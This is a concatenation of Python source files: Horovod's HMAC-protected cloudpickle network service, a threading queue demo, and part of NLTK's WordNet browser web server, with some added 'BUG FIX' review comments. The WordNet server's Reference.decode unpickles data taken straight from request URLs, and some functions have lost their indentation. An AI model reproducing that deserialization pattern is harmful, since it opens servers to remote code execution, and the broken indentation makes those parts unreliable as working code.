                                  graylog_port=argsdict['graylog_port'], graylog_output=argsdict['graylog'],
                                  file_output=argsdict['file'], publisher_id=argsdict['publisher_id'])
    collector.run_once()
|
network.py | # Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import random
import socket
import struct
import threading
import cloudpickle
import psutil
from six.moves import queue, socketserver
from horovod.run.common.util import secret
from horovod.run.util.network import find_port
class PingRequest(object):
    """Marker message sent to probe whether a service endpoint is reachable."""
    pass
class NoValidAddressesFound(Exception):
    """Raised when no usable network interface/address could be found or probed."""
    pass
class PingResponse(object):
    """Reply to a PingRequest, identifying the service and the caller's visible IP."""

    def __init__(self, service_name, source_address):
        # Service name that responded to this ping.
        self.service_name = service_name
        # Source IP address that was visible to the service.
        self.source_address = source_address
class AckResponse(object):
    """Used for situations when the response does not carry any data."""
    pass
class Wire(object):
    """
    Used for serialization/deserialization of objects over the wire.
    We use HMAC to protect services from unauthorized use. The key used for
    the HMAC digest is distributed by Open MPI and Spark.
    The objects are serialized using cloudpickle. Serialized objects become
    the body of the message.
    Structure of the message is as follows:
    - HMAC digest of the body (32 bytes)
    - length of the body (4 bytes)
    - body
    """

    def __init__(self, key):
        self._key = key

    def write(self, obj, wfile):
        """Serialize `obj` and write digest + length + body to `wfile`."""
        body = cloudpickle.dumps(obj)
        wfile.write(secret.compute_digest(self._key, body))
        # Pack message length into 4-byte integer.
        wfile.write(struct.pack('i', len(body)))
        wfile.write(body)
        wfile.flush()

    def read(self, rfile):
        """Read digest + length + body from `rfile`, verify, and deserialize."""
        digest = rfile.read(secret.DIGEST_LENGTH)
        # Unpack message length from 4-byte integer.
        body_len, = struct.unpack('i', rfile.read(4))
        body = rfile.read(body_len)
        if not secret.check_digest(self._key, body, digest):
            raise Exception('Security error: digest did not match the message.')
        return cloudpickle.loads(body)
class BasicService(object):
    """Threaded TCP service that answers Wire-framed requests (at minimum pings)."""
    def __init__(self, service_name, key, nics):
        self._service_name = service_name
        self._wire = Wire(key)
        self._nics = nics
        # find_port picks a free port and constructs the server on it.
        self._server, _ = find_port(
            lambda addr: socketserver.ThreadingTCPServer(
                addr, self._make_handler()))
        self._port = self._server.socket.getsockname()[1]
        self._addresses = self._get_local_addresses()
        # Serve in a daemon thread so the service does not block shutdown.
        self._thread = threading.Thread(target=self._server.serve_forever)
        self._thread.daemon = True
        self._thread.start()
    def _make_handler(self):
        """Build a request-handler class bound (via closure) to this service."""
        server = self
        class _Handler(socketserver.StreamRequestHandler):
            def handle(self):
                try:
                    req = server._wire.read(self.rfile)
                    resp = server._handle(req, self.client_address)
                    if not resp:
                        raise Exception('Handler did not return a response.')
                    server._wire.write(resp, self.wfile)
                except EOFError:
                    # Happens when client is abruptly terminated, don't want to pollute the logs.
                    pass
        return _Handler
    def _handle(self, req, client_address):
        """Dispatch one deserialized request; subclasses extend for more types."""
        if isinstance(req, PingRequest):
            return PingResponse(self._service_name, client_address[0])
        raise NotImplementedError(req)
    def _get_local_addresses(self):
        """Collect {interface: [(ipv4, port), ...]} for the allowed NICs."""
        result = {}
        for intf, intf_addresses in psutil.net_if_addrs().items():
            # When a NIC whitelist was given, skip interfaces not on it.
            if self._nics and intf not in self._nics:
                continue
            for addr in intf_addresses:
                if addr.family == socket.AF_INET:
                    if intf not in result:
                        result[intf] = []
                    result[intf].append((addr.address, self._port))
        if not result and self._nics:
            raise NoValidAddressesFound(
                'No available network interface found matching user provided interface: {}'.format(self._nics))
        return result
    def addresses(self):
        # Mapping of interface name -> list of (address, port) tuples.
        return self._addresses
    def shutdown(self):
        # Stop serving, close the socket, and wait for the server thread.
        self._server.shutdown()
        self._server.server_close()
        self._thread.join()
    def get_port(self):
        return self._port
class BasicClient(object):
    """Client for a BasicService: probes candidate addresses, then sends Wire-framed RPCs."""
    def __init__(self, service_name, addresses, key, verbose, match_intf=False,
                 probe_timeout=20, attempts=3):
        # Note: because of retry logic, ALL RPC calls are REQUIRED to be idempotent.
        self._verbose = verbose
        self._service_name = service_name
        self._wire = Wire(key)
        self._match_intf = match_intf
        self._probe_timeout = probe_timeout
        self._attempts = attempts
        # Keep only the addresses that answered a ping correctly.
        self._addresses = self._probe(addresses)
        if not self._addresses:
            raise NoValidAddressesFound(
                'Horovod was unable to connect to {service_name} on any '
                'of the following addresses: {addresses}.\n\n'
                'One possible cause of this problem is that '
                'horovod currently requires every host to have at '
                'least one routable network interface with the same '
                'name across all of the hosts. '
                'You can run \"ifconfig -a\" '
                'on every host and check for the common '
                'routable interface. '
                'To fix the problem, you can rename interfaces on '
                'Linux.'.format(service_name=service_name, addresses=addresses))
    def _probe(self, addresses):
        """Ping every candidate address in parallel; return the subset that responded."""
        result_queue = queue.Queue()
        threads = []
        for intf, intf_addresses in addresses.items():
            for addr in intf_addresses:
                thread = threading.Thread(target=self._probe_one,
                                          args=(intf, addr, result_queue))
                thread.daemon = True
                thread.start()
                threads.append(thread)
        for t in threads:
            t.join()
        # Regroup successful (intf, addr) results back into a dict of lists.
        result = {}
        while not result_queue.empty():
            intf, addr = result_queue.get()
            if intf not in result:
                result[intf] = []
            result[intf].append(addr)
        return result
    def _probe_one(self, intf, addr, result_queue):
        """Try to ping one address; on success put (intf, addr) on result_queue."""
        for iter in range(self._attempts):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self._probe_timeout)
            try:
                sock.connect(addr)
                rfile = sock.makefile('rb')
                wfile = sock.makefile('wb')
                try:
                    self._wire.write(PingRequest(), wfile)
                    resp = self._wire.read(rfile)
                    # A response from a different service means a wrong endpoint.
                    if resp.service_name != self._service_name:
                        return
                    if self._match_intf:
                        # Interface name of destination and source must match
                        # since `match_intf` is requested.
                        client_intf_addrs = [x.address
                                             for x in psutil.net_if_addrs().get(intf, [])
                                             if x.family == socket.AF_INET]
                        if resp.source_address not in client_intf_addrs:
                            if self._verbose >= 2:
                                # Need to find the local interface name whose
                                # address was visible to the target host's server.
                                resp_intf = ''
                                for key in psutil.net_if_addrs().keys():
                                    key_intf_addrs = [x.address
                                                      for x in psutil.net_if_addrs().get(key, [])]
                                    if resp.source_address in key_intf_addrs:
                                        resp_intf = key
                                        break
                                print('WARNING: Expected to connect the host '
                                      '{addr} using interface '
                                      '{intf}, but reached it on interface '
                                      '{resp_intf}.'.format(
                                          addr=str(addr[0])+':'+str(addr[1]),
                                          intf=intf,
                                          resp_intf=resp_intf))
                            return
                    result_queue.put((intf, addr))
                    return
                finally:
                    rfile.close()
                    wfile.close()
            except:
                # NOTE(review): deliberate best-effort — any failure just moves on
                # to the next attempt; a failed probe is expressed by not queueing.
                pass
            finally:
                sock.close()
    def _send_one(self, addr, req):
        """Send one request to `addr`, retrying up to self._attempts times."""
        for iter in range(self._attempts):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                sock.connect(addr)
                rfile = sock.makefile('rb')
                wfile = sock.makefile('wb')
                try:
                    self._wire.write(req, wfile)
                    resp = self._wire.read(rfile)
                    return resp
                finally:
                    rfile.close()
                    wfile.close()
            except:
                if iter == self._attempts - 1:
                    # Raise exception on the last retry.
                    raise
            finally:
                sock.close()
    def _send(self, req):
        # Since all the addresses were vetted, use the first one.
        addr = list(self._addresses.values())[0][0]
        return self._send_one(addr, req)
    def addresses(self):
        # Mapping of interface name -> list of vetted (address, port) tuples.
        return self._addresses
|
queuetest3.py | "same as queuetest2.py, but uses threading, not _threads"
numconsumers = 2 # how many consumers to start
numproducers = 4 # how many producers to start
nummessages = 4 # messages per producer to put
import threading, queue, time, sys
safeprint = threading.Lock() # else prints may overlap
dataQueue = queue.Queue() # shared global, infinite size
def producer(idnum, dataqueue):
for msgnum in range(nummessages):
time.sleep(idnum)
dataqueue.put('[producer id=%d, count=%d]' % (idnum, msgnum))
def consumer(idnum, dataqueue):
    """Poll *dataqueue* forever and print whatever arrives (runs until
    the process exits; consumers are started as daemon threads)."""
    while True:
        time.sleep(0.1)
        try:
            item = dataqueue.get(block=False)
        except queue.Empty:
            continue
        # Hold the shared lock so prints from concurrent consumers
        # don't interleave.
        with safeprint:
            print('consumer', idnum, 'got =>', item)
if __name__ == '__main__':
    # Consumers loop forever, so they run as daemon threads: the process
    # must be able to exit without joining them.
    for i in range(numconsumers):
        thread = threading.Thread(target=consumer, args=(i, dataQueue))
        thread.daemon = True # else cannot exit!
        thread.start()
    # Producers terminate on their own; keep handles so we can join them.
    waitfor = []
    for i in range(numproducers):
        thread = threading.Thread(target=producer, args=(i, dataQueue))
        waitfor.append(thread)
        thread.start()
    for thread in waitfor: thread.join() # or time.sleep() long enough here
    print('Main thread exit.')
|
wordnet_app.py | # Natural Language Toolkit: WordNet Browser Application
#
# Copyright (C) 2001-2018 NLTK Project
# Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
# Paul Bone <pbone@students.csse.unimelb.edu.au>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
A WordNet Browser application which launches the default browser
(if it is not already running) and opens a new tab with a connection
to http://localhost:port/ . It also starts an HTTP server on the
specified port and begins serving browser requests. The default
port is 8000. (For command-line help, run "python wordnet -h")
This application requires that the user's web browser supports
Javascript.
BrowServer is a server for browsing the NLTK Wordnet database It first
launches a browser client to be used for browsing and then starts
serving the requests of that and maybe other clients
Usage::
browserver.py -h
browserver.py [-s] [-p <port>]
Options::
-h or --help
Display this help message.
-l <file> or --log-file <file>
Logs messages to the given file, If this option is not specified
messages are silently dropped.
-p <port> or --port <port>
Run the web server on this TCP port, defaults to 8000.
-s or --server-mode
Do not start a web browser, and do not allow a user to
shotdown the server through the web interface.
"""
# TODO: throughout this package variable names and docstrings need
# modifying to be compliant with NLTK's coding standards. Tests also
# need to be develop to ensure this continues to work in the face of
# changes to other NLTK packages.
from __future__ import print_function
# Allow this program to run inside the NLTK source tree.
from sys import path
import os
import sys
from sys import argv
from collections import defaultdict
import webbrowser
import datetime
import re
import threading
import time
import getopt
import base64
import pickle
import copy
from six.moves.urllib.parse import unquote_plus
from nltk import compat
from nltk.corpus import wordnet as wn
from nltk.corpus.reader.wordnet import Synset, Lemma
if compat.PY3:
from http.server import HTTPServer, BaseHTTPRequestHandler
else:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
# now included in local file
# from util import html_header, html_trailer, \
# get_static_index_page, get_static_page_by_path, \
# page_from_word, page_from_href
firstClient = True
# True if we're not also running a web browser. The value f server_mode
# gets set by demo().
server_mode = None
# If set this is a file object for writting log messages.
logfile = None
class MyServerHandler(BaseHTTPRequestHandler):
    """HTTP request handler for the WordNet browser.

    Routes handled by do_GET:
      ''                     -> static index page
      '*.html'               -> static pages (incl. the database-info page)
      'search?...'           -> word search
      'lookup_<encoded>'     -> encoded Reference lookup
      'start_page'           -> default start page
      'SHUTDOWN THE SERVER'  -> exits, unless running in server mode
    Relies on the module globals ``server_mode``, ``firstClient`` and the
    page-building helpers defined later in this module.
    """

    def do_HEAD(self):
        # HEAD is GET minus the body: send the headers only.
        self.send_head()

    def do_GET(self):
        global firstClient
        sp = self.path[1:]  # request path without the leading '/'
        if unquote_plus(sp) == 'SHUTDOWN THE SERVER':
            # Only the locally-launched (non-server-mode) instance may be
            # shut down through the web interface.
            if server_mode:
                page = "Server must be killed with SIGTERM."
                type = "text/plain"  # NOTE: shadows the builtin `type`
            else:
                print('Server shutting down!')
                os._exit(0)

        elif sp == '': # First request.
            type = 'text/html'
            # The very first client of a non-server-mode run gets the
            # index variant that includes the shutdown control.
            if not server_mode and firstClient:
                firstClient = False
                page = get_static_index_page(True)
            else:
                page = get_static_index_page(False)
            word = 'green'

        elif sp.endswith('.html'): # Trying to fetch a HTML file TODO:
            type = 'text/html'
            usp = unquote_plus(sp)
            if usp == 'NLTK Wordnet Browser Database Info.html':
                word = '* Database Info *'
                if os.path.isfile(usp):
                    with open(usp, 'r') as infile:
                        page = infile.read()
                else:
                    # The statistics page is generated offline; explain
                    # how to produce it when it is missing.
                    page = (html_header % word) + \
                        '<p>The database info file:'\
                        '<p><b>' + usp + '</b>' + \
                        '<p>was not found. Run this:' + \
                        '<p><b>python dbinfo_html.py</b>' + \
                        '<p>to produce it.' + html_trailer
            else:
                # Handle files here.
                word = sp
                page = get_static_page_by_path(usp)

        elif sp.startswith("search"):
            # This doesn't seem to work with MWEs.
            type = 'text/html'
            # Extract the nextWord parameter from the query string.
            parts = (sp.split("?")[1]).split("&")
            word = [p.split("=")[1].replace("+", " ")
                    for p in parts if p.startswith("nextWord")][0]
            page, word = page_from_word(word)
        elif sp.startswith("lookup_"):
            # TODO add a variation of this that takes a non ecoded word or MWE.
            type = 'text/html'
            sp = sp[len("lookup_"):]  # strip prefix: what's left is the encoded Reference
            page, word = page_from_href(sp)
        elif sp == "start_page":
            # if this is the first request we should display help
            # information, and possibly set a default word.
            type = 'text/html'
            page, word = page_from_word("wordnet")
        else:
            type = 'text/plain'
            page = "Could not parse request: '%s'" % sp

        # Send result.
        self.send_head(type)
        self.wfile.write(page.encode('utf8'))

    def send_head(self, type=None):
        # Minimal success response; Content-type may be None for a bare HEAD.
        self.send_response(200)
        self.send_header('Content-type', type)
        self.end_headers()

    def log_message(self, format, *args):
        global logfile
        # Route the default stderr access log into the optional log file;
        # messages are silently dropped when no log file is configured.
        if logfile:
            logfile.write(
                "%s - - [%s] %s\n" %
                (self.address_string(),
                 self.log_date_time_string(),
                 format%args))
def get_unique_counter_from_url(sp):
    """
    Return the unique counter encoded at the end of *sp* as
    '%23<digits>' (a URL-encoded '#'), or None when the URL carries
    no counter.
    """
    _head, sep, tail = sp.rpartition('%23')
    return int(tail) if sep else None
def wnb(port=8000, runBrowser=True, logfilename=None):
    """
    Run NLTK Wordnet Browser Server.

    :param port: The port number for the server to listen on, defaults to
                 8000
    :type  port: int

    :param runBrowser: True to start a web browser and point it at the web
                       server.
    :type  runBrowser: bool

    :param logfilename: Optional path of a file to append log messages to;
                        None disables logging.
    :type  logfilename: str
    """
    # The webbrowser module is unpredictable, typically it blocks if it uses
    # a console web browser, and doesn't block if it uses a GUI webbrowser,
    # so we need to force it to have a clear correct behaviour.
    #
    # Normally the server should run for as long as the user wants. they
    # should idealy be able to control this from the UI by closing the
    # window or tab. Second best would be clicking a button to say
    # 'Shutdown' that first shutsdown the server and closes the window or
    # tab, or exits the text-mode browser. Both of these are unfreasable.
    #
    # The next best alternative is to start the server, have it close when
    # it receives SIGTERM (default), and run the browser as well. The user
    # may have to shutdown both programs.
    #
    # Since webbrowser may block, and the webserver will block, we must run
    # them in separate threads.
    #
    global server_mode, logfile
    server_mode = not runBrowser

    # Setup logging.
    if logfilename:
        try:
            logfile = open(logfilename, "a", 1) # 1 means 'line buffering'
        except IOError as e:
            # BUG FIX: file.write() takes exactly one string argument, so
            # the message must be %-formatted before being written (the
            # old call passed printf-style arguments to write()).
            sys.stderr.write("Couldn't open %s for writing: %s\n" %
                             (logfilename, e))
            sys.exit(1)
    else:
        logfile = None

    # Compute URL and start web browser
    url = 'http://localhost:' + str(port)

    server_ready = None
    browser_thread = None

    if runBrowser:
        server_ready = threading.Event()
        browser_thread = startBrowser(url, server_ready)

    # Start the server.
    server = HTTPServer(('', port), MyServerHandler)
    if logfile:
        logfile.write(
            'NLTK Wordnet browser server running serving: %s\n' % url)
    if runBrowser:
        # Release the browser thread now that the server exists.
        server_ready.set()

    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass

    if runBrowser:
        browser_thread.join()

    if logfile:
        logfile.close()
def startBrowser(url, server_ready):
    """Open *url* in a new browser tab once *server_ready* is set.

    Returns the started (non-daemon) thread so the caller can join it.
    """
    def open_when_ready():
        server_ready.wait()
        # Give the server a moment longer; the event alone still leaves
        # a small race window before it can accept connections.
        time.sleep(1)
        webbrowser.open(url, new = 2, autoraise = 1)
    browser_thread = threading.Thread(target=open_when_ready)
    browser_thread.start()
    return browser_thread
#####################################################################
# Utilities
#####################################################################
"""
WordNet Browser Utilities.
This provides a backend to both wxbrowse and browserver.py.
"""
################################################################################
#
# Main logic for wordnet browser.
#
# This is wrapped inside a function since wn is only available if the
# WordNet corpus is installed.
def _pos_tuples():
    """Return one (wn-constant, tag-letter, display-name) tuple per
    supported part of speech."""
    parts = ((wn.NOUN, 'N', 'noun'),
             (wn.VERB, 'V', 'verb'),
             (wn.ADJ, 'J', 'adj'),
             (wn.ADV, 'R', 'adv'))
    return list(parts)
def _pos_match(pos_tuple):
    """
    Return the complete pos tuple matching the partial *pos_tuple*,
    comparing on its first non-null component, or None when nothing
    matches.  A satellite-adjective tag 's' is treated as 'a'.
    """
    if pos_tuple[0] == 's':
        pos_tuple = ('a',) + tuple(pos_tuple[1:])
    # Find the index of the first non-null component; that component is
    # the comparison key.
    idx = 0
    for idx, component in enumerate(pos_tuple):
        if component is not None:
            break
    matches = [full for full in _pos_tuples() if full[idx] == pos_tuple[idx]]
    return matches[0] if matches else None
# Numeric identifiers for the relation types listed by
# get_relations_data(); used only as opaque tags in its result tuples.
HYPONYM = 0
HYPERNYM = 1
CLASS_REGIONAL = 2
PART_HOLONYM = 3
PART_MERONYM = 4
ATTRIBUTE = 5
SUBSTANCE_HOLONYM = 6
SUBSTANCE_MERONYM = 7
MEMBER_HOLONYM = 8
MEMBER_MERONYM = 9
VERB_GROUP = 10
INSTANCE_HYPONYM = 12
INSTANCE_HYPERNYM = 13
CAUSE = 14
ALSO_SEE = 15
SIMILAR = 16
ENTAILMENT = 17
ANTONYM = 18
FRAMES = 19
PERTAINYM = 20

CLASS_CATEGORY = 21
CLASS_USAGE = 22
# NOTE(review): the assignments below re-define names already assigned
# above, silently overriding them.  The effective values are
# CLASS_REGIONAL=23 (was 2), CLASS_USAGE=24 (was 22) and
# CLASS_CATEGORY=11 (was 21).
CLASS_REGIONAL = 23
CLASS_USAGE = 24
CLASS_CATEGORY = 11

DERIVATIONALLY_RELATED_FORM = 25
INDIRECT_HYPERNYMS = 26
def lemma_property(word, synset, func):
    """
    Apply *func* to every lemma of *synset* whose name equals *word*
    and return the concatenation of the resulting lists.

    :param word: lemma name to select
    :param synset: the Synset whose lemmas are examined
    :param func: callable mapping a Lemma to a list
    :return: a single flat list of all results
    """
    # BUG FIX: Synset.lemmas and Lemma.name are methods in the NLTK 3
    # API (they are invoked as methods everywhere else in this module),
    # so they must be called, not iterated/compared as attributes.
    results = [func(l) for l in synset.lemmas() if l.name() == word]
    # Flatten iteratively; the original recursive helper rebuilt the
    # list on every step (quadratic).
    flat = []
    for partial in results:
        flat.extend(partial)
    return flat
def rebuild_tree(orig_tree):
    """Convert a list-shaped tree ``[node, child1, child2, ...]`` (the
    format produced by ``Synset.tree``) into nested ``(node, children)``
    tuples, where ``children`` is a list of rebuilt subtrees."""
    subtrees = [rebuild_tree(child) for child in orig_tree[1:]]
    return (orig_tree[0], subtrees)
def get_relations_data(word, synset):
    """
    Get synset relations data for a synset.  Note that this doesn't
    yet support things such as full hyponym vs direct hyponym.

    :param word: the current word (used for lemma-level relations)
    :param synset: the Synset whose relations are collected
    :return: a tuple of (relation_id, display_name, related_items) triples
    :raises TypeError: if the synset's POS is not noun/verb/adj/adv
    """
    if synset.pos() == wn.NOUN:
        return ((HYPONYM, 'Hyponyms',
                 synset.hyponyms()),
                (INSTANCE_HYPONYM , 'Instance hyponyms',
                 synset.instance_hyponyms()),
                (HYPERNYM, 'Direct hypernyms',
                 synset.hypernyms()),
                (INDIRECT_HYPERNYMS, 'Indirect hypernyms',
                 rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1]),
                # hypernyms', 'Sister terms',
                (INSTANCE_HYPERNYM , 'Instance hypernyms',
                 synset.instance_hypernyms()),
                # (CLASS_REGIONAL, ['domain term region'], ),
                (PART_HOLONYM, 'Part holonyms',
                 synset.part_holonyms()),
                (PART_MERONYM, 'Part meronyms',
                 synset.part_meronyms()),
                (SUBSTANCE_HOLONYM, 'Substance holonyms',
                 synset.substance_holonyms()),
                (SUBSTANCE_MERONYM, 'Substance meronyms',
                 synset.substance_meronyms()),
                (MEMBER_HOLONYM, 'Member holonyms',
                 synset.member_holonyms()),
                (MEMBER_MERONYM, 'Member meronyms',
                 synset.member_meronyms()),
                (ATTRIBUTE, 'Attributes',
                 synset.attributes()),
                (ANTONYM, "Antonyms",
                 lemma_property(word, synset, lambda l: l.antonyms())),
                (DERIVATIONALLY_RELATED_FORM, "Derivationally related form",
                 lemma_property(word, synset, lambda l: l.derivationally_related_forms())))
    elif synset.pos() == wn.VERB:
        return ((ANTONYM, 'Antonym',
                 lemma_property(word, synset, lambda l: l.antonyms())),
                (HYPONYM, 'Hyponym',
                 synset.hyponyms()),
                (HYPERNYM, 'Direct hypernyms',
                 synset.hypernyms()),
                (INDIRECT_HYPERNYMS, 'Indirect hypernyms',
                 rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1]),
                (ENTAILMENT, 'Entailments',
                 synset.entailments()),
                (CAUSE, 'Causes',
                 synset.causes()),
                (ALSO_SEE, 'Also see',
                 synset.also_sees()),
                (VERB_GROUP, 'Verb Groups',
                 synset.verb_groups()),
                (DERIVATIONALLY_RELATED_FORM, "Derivationally related form",
                 lemma_property(word, synset, lambda l: l.derivationally_related_forms())))
    # BUG FIX: the second comparison was `synset.pos == wn.ADJ_SAT`
    # (missing call parentheses), which compared the bound method object
    # itself and was therefore always False, so satellite adjectives
    # fell through to the TypeError below.
    elif synset.pos() == wn.ADJ or synset.pos() == wn.ADJ_SAT:
        return ((ANTONYM, 'Antonym',
                 lemma_property(word, synset, lambda l: l.antonyms())),
                (SIMILAR, 'Similar to',
                 synset.similar_tos()),
                # Participle of verb - not supported by corpus
                (PERTAINYM, 'Pertainyms',
                 lemma_property(word, synset, lambda l: l.pertainyms())),
                (ATTRIBUTE, 'Attributes',
                 synset.attributes()),
                (ALSO_SEE, 'Also see',
                 synset.also_sees()))
    elif synset.pos() == wn.ADV:
        # This is weird. adverbs such as 'quick' and 'fast' don't seem
        # to have antonyms returned by the corpus.a
        return ((ANTONYM, 'Antonym',
                 lemma_property(word, synset, lambda l: l.antonyms())),)
        # Derived from adjective - not supported by corpus
    else:
        # BUG FIX: typo "Unhandles" -> "Unhandled" in the error message.
        raise TypeError("Unhandled synset POS type: " + str(synset.pos()))
# Page scaffolding shared by all generated pages: html_header takes the
# display word via '%s'; html_trailer closes what html_header opened
# (assembled by pg() below).
html_header = '''
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://www.w3.org/TR/html4/strict.dtd'>
<html>
<head>
<meta name='generator' content=
'HTML Tidy for Windows (vers 14 February 2006), see www.w3.org'>
<meta http-equiv='Content-Type' content=
'text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: %s</title></head>
<body bgcolor='#F5F5F5' text='#000000'>
'''
html_trailer = '''
</body>
</html>
'''

# Help text shown above the first search result (the 'green' demo page).
explanation  = '''
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.
</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
<hr width='100%'>
'''
# HTML oriented functions
def _bold(txt): return '<b>%s</b>' % txt
def _center(txt): return '<center>%s</center>' % txt
def _hlev(n,txt): return '<h%d>%s</h%d>' % (n,txt,n)
def _italic(txt): return '<i>%s</i>' % txt
def _li(txt): return '<li>%s</li>' % txt
def pg(word, body):
    '''
    Build a complete NLTK-Browser-format HTML page for *word*.

    :param word: The word that the body corresponds to
    :type word: str
    :param body: The HTML body corresponding to the word
    :type body: str
    :return: a HTML page for the word-body combination
    :rtype: str
    '''
    header = html_header % word
    return header + body + html_trailer
def _ul(txt): return '<ul>' + txt + '</ul>'
def _abbc(txt):
"""
abbc = asterisks, breaks, bold, center
"""
return _center(_bold('<br>'*10 + '*'*10 + ' ' + txt + ' ' + '*'*10))
# Pre-built bullet note appended when a hyponym listing is truncated.
full_hyponym_cont_text = \
    _ul(_li(_italic('(has full hyponym continuation)'))) + '\n'
def _get_synset(synset_key):
    """
    Return the Synset object for *synset_key*.

    The synset key is the unique name of the synset; it can be
    retrieved via Synset.name().
    """
    return wn.synset(synset_key)
def _collect_one_synset(word, synset, synset_relations):
    '''
    Returns the HTML string for one synset or word

    :param word: the current word
    :type word: str
    :param synset: a synset
    :type synset: synset
    :param synset_relations: information about which synset relations
    to display.
    :type synset_relations: dict(synset_key, set(relation_id))
    :return: The HTML string built for this synset
    :rtype: str
    '''
    if isinstance(synset, tuple): # It's a word
        raise NotImplementedError("word not supported by _collect_one_synset")

    typ = 'S'
    pos_tuple = _pos_match((synset.pos(), None, None))
    assert pos_tuple is not None, "pos_tuple is null: synset.pos(): %s" % synset.pos()
    descr = pos_tuple[2]

    # Make the synset label a link that toggles display of its relations.
    # Deep copy so the caller's synset_relations mapping is not mutated.
    ref = copy.deepcopy(Reference(word, synset_relations))
    ref.toggle_synset(synset)
    synset_label = typ + ";"
    if synset.name() in synset_relations:
        # Relations for this synset are currently expanded; show it bold.
        synset_label = _bold(synset_label)
    s = '<li>%s (%s) ' % (make_lookup_link(ref, synset_label), descr)

    def format_lemma(w):
        # Lemma names use '_' for spaces; the search word itself is
        # bolded while other lemmas become search links.
        w = w.replace('_', ' ')
        if w.lower() == word:
            return _bold(w)
        else:
            ref = Reference(w)
            return make_lookup_link(ref, w)

    s += ', '.join(format_lemma(l.name()) for l in synset.lemmas())

    # Definition plus quoted usage examples.
    gl = " (%s) <i>%s</i> " % \
        (synset.definition(),
         "; ".join("\"%s\"" % e for e in synset.examples()))
    return s + gl + _synset_relations(word, synset, synset_relations) + '</li>\n'
def _collect_all_synsets(word, pos, synset_relations=None):
    """
    Return a HTML unordered list of synsets for the given word and
    part of speech.

    :param synset_relations: optional mapping of synset key -> set of
        relation ids to render expanded; defaults to no expansion.
    """
    # BUG FIX: the default used to be the mutable literal dict(), which
    # is created once and shared by every call; use None and create a
    # fresh dict per call instead.
    if synset_relations is None:
        synset_relations = dict()
    return '<ul>%s\n</ul>\n' % \
        ''.join((_collect_one_synset(word, synset, synset_relations)
                 for synset
                 in wn.synsets(word, pos)))
def _synset_relations(word, synset, synset_relations):
    '''
    Builds the HTML string for the relations of a synset

    :param word: The current word
    :type word: str
    :param synset: The synset for which we're building the relations.
    :type synset: Synset
    :param synset_relations: synset keys and relation types for which to display relations.
    :type synset_relations: dict(synset_key, set(relation_type))
    :return: The HTML for a synset's relations
    :rtype: str
    '''
    if not synset.name() in synset_relations:
        # Relations for this synset are collapsed; render nothing.
        return ""
    ref = Reference(word, synset_relations)

    def relation_html(r):
        # Render one relation target, which may be a Synset, a Lemma, or
        # a (Synset, [children]) tree as produced by rebuild_tree().
        if isinstance(r, Synset):
            return make_lookup_link(Reference(r.lemma_names()[0]), r.lemma_names()[0])
        elif isinstance(r, Lemma):
            return relation_html(r.synset())
        elif isinstance(r, tuple):
            # It's probably a tuple containing a Synset and a list of
            # similar tuples. This forms a tree of synsets.
            return "%s\n<ul>%s</ul>\n" % \
                (relation_html(r[0]),
                 ''.join('<li>%s</li>\n' % relation_html(sr) for sr in r[1]))
        else:
            raise TypeError("r must be a synset, lemma or list, it was: type(r) = %s, r = %s" % (type(r), r))

    def make_synset_html(db_name, disp_name, rels):
        # Relation-name link that toggles this relation's expansion.
        # NOTE(review): .encode() yields a string here, and
        # make_lookup_link calls .encode() on it again — under Python 3
        # str.encode() returns bytes; confirm the generated href is the
        # intended one on Python 3.
        synset_html = '<i>%s</i>\n' % \
            make_lookup_link(
                copy.deepcopy(ref).toggle_synset_relation(synset, db_name).encode(),
                disp_name)

        if db_name in ref.synset_relations[synset.name()]:
            # Expanded: list every related item under the relation name.
            synset_html += '<ul>%s</ul>\n' % \
                ''.join("<li>%s</li>\n" % relation_html(r) for r in rels)

        return synset_html

    html = '<ul>' + \
        '\n'.join(("<li>%s</li>" % make_synset_html(*rel_data) for rel_data
                   in get_relations_data(word, synset)
                   if rel_data[2] != [])) + \
        '</ul>'

    return html
class Reference(object):
    """
    A reference to a page that may be generated by page_word
    """

    def __init__(self, word, synset_relations=None):
        """
        Build a reference to a new page.

        word is the word or words (separated by commas) for which to
        search for synsets of

        synset_relations is a dictionary of synset keys to sets of
        synset relation identifiers to unfold a list of synset
        relations for.
        """
        self.word = word
        # BUG FIX: the default was the mutable literal dict(), created
        # once and shared by every Reference built without an explicit
        # mapping; toggle_synset() then mutated that shared dict across
        # unrelated instances.  Create a fresh dict per instance.
        self.synset_relations = {} if synset_relations is None else synset_relations

    def encode(self):
        """
        Encode this reference into a string to be used in a URL.
        """
        # This uses a tuple rather than an object since the python
        # pickle representation is much smaller and there is no need
        # to represent the complete object.
        string = pickle.dumps((self.word, self.synset_relations), -1)
        return base64.urlsafe_b64encode(string).decode()

    @staticmethod
    def decode(string):
        """
        Decode a reference encoded with Reference.encode
        """
        string = base64.urlsafe_b64decode(string.encode())
        word, synset_relations = pickle.loads(string)
